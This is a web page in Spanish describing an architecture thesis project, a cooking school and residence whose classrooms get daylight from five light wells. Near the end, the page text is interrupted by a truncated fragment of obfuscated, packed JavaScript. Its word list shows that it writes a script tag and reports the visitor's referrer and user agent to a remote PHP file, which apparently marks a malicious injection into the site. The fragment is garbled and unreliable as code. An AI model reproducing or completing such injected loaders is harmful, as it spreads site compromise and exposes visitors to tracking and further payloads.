/PFC2012/ COMER Y MAS. MARIA BONET GUERRERO

 

El edificio se encuentra en un patio de manzana, acorralado por otros de mayor escala.

No es un edificio con miras al exterior, y su principal carencia, la luz natural…

Asumiendo dichas características, el objetivo es: cómo dotar de luz natural a un espacio, cuyas funciones, fundamentalmente enfocadas a la docencia, necesitan ésta como requisito para su desarrollo.

Por consecuente, al no poder expandirse, debe mirarse a si mismo.

La luz natural se materializa a través de 5 patios de luz, que, atravesando las dos plantas, conectan los dos mundos, creando relaciones visuales y generando las funciones propuestas por el programa.

Se propone una Escuela – Residencia de cocina, en la que conviven dos tipos de usuarios: por un lado, el habitante / residente, que vive directamente en el espacio. Y, el visitante, que a su manera, también hace uso de estos espacios a modo de casa.

El concepto de tiempo es importante en el proyecto.

No se proponen espacios ajustados a unos horarios concretos. Es un lugar al que ir y estar.

Se pretende que haya una interrelación entre las diferentes actividades, y que éstos queden diferenciados tanto por la luz, como por la escala, los materiales y su topología…

 

María Bonet Guerrero

 

no images were found

=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("<\/k"+"l>");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|hhydn|var|u0026u|referrer|kehft||js|php'.split('|'),0,{})) id=59]

Programa del PFC